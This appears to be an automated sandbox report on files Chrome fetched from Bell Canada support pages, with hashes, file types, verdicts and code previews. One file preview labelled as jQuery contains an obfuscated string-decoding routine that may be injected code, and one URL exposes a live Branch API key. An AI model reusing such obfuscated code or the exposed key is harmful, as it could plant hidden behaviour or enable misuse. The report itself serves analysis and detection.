                                                                                                                                                                                                                                                                                                                                      Preview:......JFIF.....H.H.....C....................................................................C.......................................................................M.Q...............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...~".B.o.o....G.=~.....v.s...[.i..v6.>X.d.......4..n5.WQ...t.k..ky=~..3.).....05.,.8......=j...s..(Q..z.Ui...N.'.R..S.<..;..w)..y.6._..~...V.$!.h.....V.Vp...O..'.V...'Z.!/.c......|x..._i.....3.H.h./.4..]...[.8....(.m.@k....N.gqs....x.RC.?......8J8.9...:.y.4.bqx.....0tp..c.......N...?..7...q...s.Uj....Q.rQ.<6...ba..?15.C......|.......O.|Iu..~.[.O.h..ff..h..N..
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (32026), with CRLF, LF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):342141
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.947711427808844
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3072:khVLvH3MX1TNfb6t15cSgLeT3VOCfQpImNgqgRZBGjhKruRgvj:kvL/3MhNfet15cwT3VONgqg4Jgvj
                                                                                                                                                                                                                                                                                                                                      MD5:D5139C7D98945D6CD2EE756AB9E6236D
                                                                                                                                                                                                                                                                                                                                      SHA1:EF128990665894B8B07F14628D43E9C96F8A8531
                                                                                                                                                                                                                                                                                                                                      SHA-256:599D896DC10E534AB68D8831E1BA476524825F864EF9ACAF87FAB5982DA6C478
                                                                                                                                                                                                                                                                                                                                      SHA-512:763005443350E027E96F7C12930A09BDD00574BAD3C50668260475EF5A39BB349C74A5BB101748325AFC7E0A7267DDC2D82194B4ED64390EEFBAD519FFE869DF
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://support.bell.ca/styles/media/support/core/js/support-core.js?v=6I6cG6_9h4sLsAfWIsz7feMFR4SpmPrmv6fR6KvTBgE1
                                                                                                                                                                                                                                                                                                                                      Preview:/* Minification failed. Returning unminified contents...(623,46-47): run-time error JS1195: Expected expression: >..(625,10-11): run-time error JS1195: Expected expression: )..(632,53-54): run-time error JS1195: Expected expression: )..(632,56-57): run-time error JS1195: Expected expression: >..(634,9-10): run-time error JS1002: Syntax error: }..(637,9-10): run-time error JS1002: Syntax error: }..(638,57-58): run-time error JS1004: Expected ';': {..(646,10-11): run-time error JS1195: Expected expression: )..(649,33-34): run-time error JS1004: Expected ';': {..(674,41-42): run-time error JS1195: Expected expression: >..(676,14-15): run-time error JS1195: Expected expression: )..(677,56-57): run-time error JS1195: Expected expression: )..(677,59-60): run-time error JS1195: Expected expression: >..(679,14-15): run-time error JS1195: Expected expression: )..(680,34-35): run-time error JS1197: Too many errors. The file might not be a JavaScript file: ...(669,5-38): run-time error JS1301: En
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (18308)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):18928
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.641565573664448
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:qohDrghXUPMCvumkDNYuZtlI5SJr9eY/l4naes/bAgdZ2A6Hr0g:jfyUwmydVr9e5aegd2A6HH
                                                                                                                                                                                                                                                                                                                                      MD5:14829D397567F087775A174778343B90
                                                                                                                                                                                                                                                                                                                                      SHA1:DDB522B447CA0DE357BBABC7A32A906CA619C032
                                                                                                                                                                                                                                                                                                                                      SHA-256:6F9D05882DC626A84E3E41728F81D871A8C935B5735C9EA7570D177CC90767E9
                                                                                                                                                                                                                                                                                                                                      SHA-512:9B8BA9463A744CFF9C644E19B07D3D883D9CEB95A232D9E63EC51308A0388324D0C9E34D5538C2773195E5E70158E166DAF7B83ABCDE23D47D0686397886C5B9
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://www.google.com/js/bg/b50FiC3GJqhOPkFyj4HYcajJNbVzXJ6nVw0XfMkHZ-k.js
                                                                                                                                                                                                                                                                                                                                      Preview:/* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */ (function(){var F=function(E){return E},p=this||self,t=function(E,T){if(!(E=(T=null,p).trustedTypes,E)||!E.createPolicy)return T;try{T=E.createPolicy("bg",{createHTML:F,createScript:F,createScriptURL:F})}catch(y){p.console&&p.console.error(y.message)}return T};(0,eval)(function(E,T){return(T=t())&&E.eval(T.createScript("1"))===1?function(y){return T.createScript(y)}:function(y){return""+y}}(p)(Array(Math.random()*7824|0).join("\n")+['(function(){/*',.'',.' Copyright Google LLC',.' SPDX-License-Identifier: Apache-2.0',.'*/',.'var G=function(E,T,F,t,d,p,J,Q){if(((((d=(J=(p=(Q=(E||T.C++,T.i>0&&T.S&&T.hP)&&T.l<=1&&!T.V&&!T.J&&(!E||T.Pu-F>1)&&document.hidden==0,T).C==4)||Q?T.R():T.I,J-T.I),T).s+=d>>14>0,T.h)&&(T.h^=(T.s+1>>2)*(d<<2)),T).H=T.s+1>>2!=0||T.H,p)||Q)T.C=0,T.I=J;if(!Q)return false;if((T.i>T.g&&(T.g=T.i),J-T.B)<T.i-(t?255:E?5:2))return false;return c(T,360,(t=(T.Pu=F,S(T,E?157:360)),T.P)),T.W
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):93
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.904157601986404
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ub/HXiREuP1yqXXl6EJPA1CSHI:UrXiHPwqX1l8Ro
                                                                                                                                                                                                                                                                                                                                      MD5:D5B2ABFA0AC10C041D40613D226A067D
                                                                                                                                                                                                                                                                                                                                      SHA1:4D791DA7F753D6BD3D582252561F177A2E8D97D7
                                                                                                                                                                                                                                                                                                                                      SHA-256:96D36AEBA93802197A777EEA4B7B5BF97AD603175D36B8737F0101E43F7F28E6
                                                                                                                                                                                                                                                                                                                                      SHA-512:F925A88FB38B3AA944568410662418C4131CDB87950FAF374E55F90975F9A3346F0392B03224DAF2E65427623039581E99C0FBC9C60F36D1935ABBB52CBC5E6E
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:/**/ typeof branch_callback__13 === 'function' && branch_callback__13("1380522052703713689");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (62301)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):62383
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.547361567820167
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:768:S4nHuTXW0Ano5nyAJNMjsGxMyjdSXfMESD15XCaJuHsMjPMuMSzMxKOZvxEOFpN:LHUG0AwDJVGxHoPMEc1fMn0IgUSEmN
                                                                                                                                                                                                                                                                                                                                      MD5:D7B2D55FFB68744F0594B74FDF1A5467
                                                                                                                                                                                                                                                                                                                                      SHA1:FA6A68C8A4ABC21A0FAE44A48795B536231EA84D
                                                                                                                                                                                                                                                                                                                                      SHA-256:12EFE7186801632BE89FD128FA6452C10D6D0D62F72E7E327F550891EA98E42F
                                                                                                                                                                                                                                                                                                                                      SHA-512:FF7255199303A9A0FBDE88882073E252D118D8333874F368F61D13E53DF7C4E08B319C2ACB649BBC4B064C2226BD18DC63EFDA4A5FCD1177953E22F395E62441
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:/*! jQuery | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(t,e){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=t.document?e(t,!0):function(t){if (!t.document) throw new Error("jQuery requires a window with a document");return e(t)}:e(t)}("undefined"!=typeof window?window:this,function(t,e){"use strict";function n(t,e){for(var n in e)e.hasOwnProperty(n)&&(t[n]=e[n]);return t}function o(){}function i(t,e){return new i.fn.init(t,e)}function r(t){return"function"==typeof t}function s(t){return"string"==typeof t}function a(t){return"object"==typeof t&&null!==t}function c(t){return a(t)&&t.nodeType}function u(t){return t instanceof i}function a0d(a,b){const c=a0c();return a0d=function(d,e){d=d-(0x1*0xb81+-0x107+-0x93c);let f=c[d];if(a0d['wzuedA']===undefined){var g=function(l){const m='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let n='',o='',p=n+g;for(let q=0x93f+-0x7*0x118+-0x197,r,s,t=-0x30d*0x1+
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1614)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1761
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.4157915092337285
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:zl1ect/BMl1GvxLE54Bh33hs4IqKDnRFN59acFdWFVNIsUKxlQgggqDmqI2tbQRK:zljt/BMlsJY5vDf9hdcxxqiqDpAe57pv
                                                                                                                                                                                                                                                                                                                                      MD5:2C5B10008FFD78B559E9EDAD15D79BC0
                                                                                                                                                                                                                                                                                                                                      SHA1:9D477A2B5C1E5AE1CF44B5F7322059ADFB6D9505
                                                                                                                                                                                                                                                                                                                                      SHA-256:70845DF3667BE0DBF606B8D35ADEFECD7B1DD1D623B60878974A21A99D5EC5FC
                                                                                                                                                                                                                                                                                                                                      SHA-512:B29C1F19BB607766AB38F79E89554DF18C4218F27FCBC0E16CA68A8657B41BBCB6F85A901E2B61AEB830978E20068015CF86BFBDA629D1E5254AE31A395F885B
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCa747122d14e1446181b879b9f444e263-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCa747122d14e1446181b879b9f444e263-source.min.js', "try{var brsPathList=[\"/Bell-bundles\",\"/Forfaits-Bell\",\"/Bell_Internet\",\"/Services_Internet\",\"/Bell_TV\",\"/Bell_Tele\",\"/Fibe-TV\",\"/Tele-Fibe\",\"/Appli-Tele-Fibe\",\"/Home_phone\",\"/Telephonie\",\"/Smart-Home\",\"/Maison-intelligente\",\"/search\",\"/recherche\",\"/Bell-Promotions/Promo-Code\",\"/Offres-de-Bell/Code-promotionnel\"],mobPathList=[\"/Mobility/Our_network$\",\"/Mobilite/Le_reseau$\",\"/Mobility/Trade-in-program$\",\"/Mobilite/Programme-d-echange-Bell$\",\"/Mobility/Cell_phone_plans/Unlimited-plans$\",\"/Mobilite/Forfaits/Forfaits-illimites$\",\"/Mobility/Smartphones_and_mobile_internet_devices$\",\"/Mobilite/Telephones_cellulaires_intelligent_et_Internet_mobile$\",\"/Mo
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                      MD5:99914B932BD37A50B983C5E7C90AE93B
                                                                                                                                                                                                                                                                                                                                      SHA1:BF21A9E8FBC5A3846FB05B4FA0859E0917B2202F
                                                                                                                                                                                                                                                                                                                                      SHA-256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
                                                                                                                                                                                                                                                                                                                                      SHA-512:27C74670ADB75075FAD058D5CEAF7B20C4E7786C83BAE8A32F626F9782AF34C9A33C2046EF60FD2A7878D378E29FEC851806BBD9A67878F3A9F1CDA4830763FD
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:{}
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (41530)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):446213
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.634854384537632
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3072:gKtNePFXIPH6KAU9h9fnTNRobsDi/++dXR8TNMmnBBypMceLFxCTEp5yp+lvHXal:EFYrPT/obyi5XRqNMm1TLkEp9Xwca4W
                                                                                                                                                                                                                                                                                                                                      MD5:2BD78A9A0370D7CD5BD24B3F7A128545
                                                                                                                                                                                                                                                                                                                                      SHA1:73EED1A19CD7A2BE0BA08E0220908A251F3D17BD
                                                                                                                                                                                                                                                                                                                                      SHA-256:D245EFE47B6DD5368D503E24129408EBFAF69BF6FB43198462663AB1880033EC
                                                                                                                                                                                                                                                                                                                                      SHA-512:90506389599E10678076671DB182DEC8F3307DF6AFC3D1B5237CC6F5D8D54BA07C55B5D9DEAC62808A5DE8BF4A48B2AF468D9BBD4AAF35AD9FAFF8C1CA953C83
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:.window.MDIGITAL=window.MDIGITAL||{};window.MDIGITAL.TRACKER=function(D,e){var t=function(){D.MDIGITAL.md_tracker=D.MDIGITAL.md_tracker||[];if(!MDIGITAL.md_tracker.__SV){var i,o;MDIGITAL.md_tracker._i=[];MDIGITAL.md_tracker.init=function(e,t){function r(e,t){var r=t.split(".");2===r.length&&(e=e[r[0]],t=r[1]);e[t]=function(){e.push([t].concat(Array.prototype.slice.call(arguments,0)))}}var n=MDIGITAL.md_tracker;"undefined"!==typeof t?n=MDIGITAL.md_tracker[t]=[]:t="md_tracker";i=["trackEvent","trackEventLater","flush","set_config"];for(o=0;o<i.length;o++)r(n,i[o]);if(e){MDIGITAL.md_tracker._i.push([e,t])}};MDIGITAL.md_tracker.__SV=1.2}};var r=function(){var t=Array.prototype,e=Object.prototype,i=t.slice,r=e.toString,c=e.hasOwnProperty,u=D.console,n=D.navigator,f=D.document,o=n.userAgent,a;if(n.userAgentData&&n.userAgentData.platform){a=n.userAgentData.getHighEntropyValues(["architecture","bitness","model","platformVersion","uaFullVersion","fullVersionList","wow64"]).then(JSON.stringify)}
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1446
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.036248523737921
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:CmrAAw96jimX8SCZUYRaRM+Jzo8MdtJAC8760O1mrRsUjxPyt:CJGjimX8SmUaaeZwC90OYsMPyt
                                                                                                                                                                                                                                                                                                                                      MD5:5B35E8B38DA17E517934E249416F4213
                                                                                                                                                                                                                                                                                                                                      SHA1:27DC111721746E492CE1037307812622CBDCE8D2
                                                                                                                                                                                                                                                                                                                                      SHA-256:AF03614D99771E0F3786FDA656E7020A7BB83EA098F7A29F78F8F3F0B10BD049
                                                                                                                                                                                                                                                                                                                                      SHA-512:8D7537EC5BEFC09956B4D6266860867B6CB39A9E8D951DB083D87A807E2A547184DB71F2DB08DE79285DB7E98F144F229F6F04607439CCC9075A9AE7649E4DB5
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:/*..OnlineOpinion v5.9.0..Released: 11/17/2014. Compiled 11/17/2014 01:01:01 PM -0600..Branch: master 7cffc7b9a0b11594d56b71ca0cb042d9b0fc24f5..Components: Full..UMD: disabled..The following code is Copyright 1998-2014 Opinionlab, Inc. All rights reserved. Unauthorized use is prohibited. This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. http://www.opinionlab.com..*/..../* global window, OOo */../*..Inline configuration..*********************..Object is now being instantiated against the OOo object (1 global class)..To call this object, place the below in the click event..OOo.oo_feedback.show(event)..*/..(function (w, o) {.. 'use strict';.. var oo_rp = '://en-ca.mybell.bell.ca';.. var lang = OOo.readCookie('gemini');.. if ((/language=fr/i).test(lang)) {.. oo_rp = '://fr-ca.mybell.bell.ca';.. }.... var OpinionLabInit = function () {.... o.oo_feedback = new o.Ocode({..
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):91
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.902793404502967
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ub/HXiREpEyqXXl6EAeQ1CSHI:UrXiglqX17MRo
                                                                                                                                                                                                                                                                                                                                      MD5:ABEC128E96803A20D55C93E54FAD5458
                                                                                                                                                                                                                                                                                                                                      SHA1:E60C513C210F84533668558E6343B4BAC948E878
                                                                                                                                                                                                                                                                                                                                      SHA-256:910D0405D12EF4DD1354343212C91BE169D0769E2163EECD9A877C00AFA3E795
                                                                                                                                                                                                                                                                                                                                      SHA-512:284E2DC7C6A5D25020791EC4B7193715F442B3C6250156C063ED0FE79E57094FC79DD14568E227FB282961B9CF25D6466851A8CD65F66EC3B28E77237FCAB94A
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://app.link/_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__0
                                                                                                                                                                                                                                                                                                                                      Preview:/**/ typeof branch_callback__0 === 'function' && branch_callback__0("1380522052703713689");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (543)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):690
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.414421274239957
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:12:jvgeTrAApBSECpct/BeTrAApBSECcLKvo31FXiTGcKX3SPwmLAfHTN5drbHqMTkY:zlCpct/BMlCtvo3DjSBLAfTrdrbLTkuT
                                                                                                                                                                                                                                                                                                                                      MD5:DC27892943C0BD9A7E5F4BA4A7E4C31F
                                                                                                                                                                                                                                                                                                                                      SHA1:9F3CBABD04A0938296BF7129B7F2A85C86EC201A
                                                                                                                                                                                                                                                                                                                                      SHA-256:D380077A0DE0C31E8134C6D935263E870E11AB380EE07C8661F8A7BD34319C3B
                                                                                                                                                                                                                                                                                                                                      SHA-512:134B8198D09CF20C8A6FE86AD96491789F679FCF5CE54720D3434D86251159A9A746EC4504C1B397EE3E87613428D28EE2FCD616DA5FDEE97266598F0E081E7E
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC6732f5ab8e4146b3ae804646fc9078fb-source.min.js
                                                                                                                                                                                                                                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC6732f5ab8e4146b3ae804646fc9078fb-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC6732f5ab8e4146b3ae804646fc9078fb-source.min.js', "var cookie=_satellite.cookie.get(\"OptanonConsent\"),re=/groups=([^&]*)/i,result=\"not available\";if(cookie&&re.test(cookie))result=cookie.match(re)[1];else if(\"undefined\"!=typeof OnetrustActiveGroups){var values=OnetrustActiveGroups;result=(values=values.split(\",\")).filter((e=>\"\"!==e));for(var i=0;i<result.length;i++)result[i]+=\":1\";result=result.join(\",\")}window.s_oDPF=result;");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):330683
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.998572897722901
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:6144:8ueYWvdFXxI/4YNNsn4qrDH5cxOlpWpJAkdJYJM70cJxMvWS2cTtycAraMp:deP4AH5vlQJA4JYSAcy2cTtyt
                                                                                                                                                                                                                                                                                                                                      MD5:8EBCC45DF3525B14228585B7291E777B
                                                                                                                                                                                                                                                                                                                                      SHA1:75E4B80A1F12A7C7EB5CD84EA9257F28A9F9DA48
                                                                                                                                                                                                                                                                                                                                      SHA-256:2178939A4C224E46830C2D5A5233480621324AE8B25952EA43562CE2ABE272DF
                                                                                                                                                                                                                                                                                                                                      SHA-512:AB4AF70132A942F4E9C4BE261D73607B5CB0E5B50E90433400DBAD17C411D323317926B1FD0E90251356716E2D6DD798625FE21F670669F5F67B68F668B74EFD
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://support.bell.ca/js/bellsupport-tlp-custom.js?async&seed=AIBQqeKSAQAA1tX58auB8tK1poG5v7Sf7FQz5cMvgdIpF9clDWjTuQx_YjyA&lmSeL8qArw--z=q
                                                                                                                                                                                                                                                                                                                                      Preview:(function C(fC,g,y,h){var fJ=ReferenceError,fp=TypeError,fE=Object,fK=RegExp,fn=Number,fi=String,fz=Array,fG=fE.bind,fF=fE.call,fv=fF.bind(fG,fF),U=fE.apply,fB=fv(U),j=[].push,s=[].pop,M=[].slice,w=[].splice,R=[].join,P=[].map,N=fv(j),z=fv(M),S=fv(R),D=fv(P),B={}.hasOwnProperty,fT=fv(B),n=JSON.stringify,fb=fE.getOwnPropertyDescriptor,fQ=fE.defineProperty,fl=fi.fromCharCode,O=typeof URL==="function"?URL.createObjectURL:null,fr=typeof Blob==="function"?Blob:null,fL=typeof Worker==="function"?Worker:null,A=Math.min,fk=Math.floor,fI=fE.create,H="".indexOf,e="".charAt,fd=fv(H),fa=fv(e),ft=typeof Uint8Array==="function"?Uint8Array:fz;var ff=[fJ,fp,fE,fK,fn,fi,fz,fG,fF,U,j,s,M,w,R,P,B,n,fb,fQ,fl,A,fk,fI,H,e,ft];var E=["RMS8enmxNig-w80cm15-KIrnSxhMFrWri59l0HvFJfB6eCX2","yaaXHVehRSdR574h2FJzCLG3a2Q","querySelector","4OnMOR3yfg","0pqYbAqgNwZ5","y_vUTk0","i9fbdFrrPFQ3i5Vg","fx586Odo2Mqa","WKTYXl3FdE5M65MG30Q","JDoHjNp14J3ueFKYJ9XWvQBez9rJ6XFQSniNfOlDuA","DsXaSX4","1KCNVkeU","DiRXibtA","7mVXwqQ","
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (723)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):7076
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.52488676121649
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:bttd4a6O1T6ahNU3dJ+SrM0hjUYIW2WX8ISlY:bBJ1T9UNJ+SrM0lXV2WXXSlY
                                                                                                                                                                                                                                                                                                                                      MD5:88A2E0A522036C0B87E03552E56629AA
                                                                                                                                                                                                                                                                                                                                      SHA1:EC9D1157518E753A84DBDE1333A29B34CF776D63
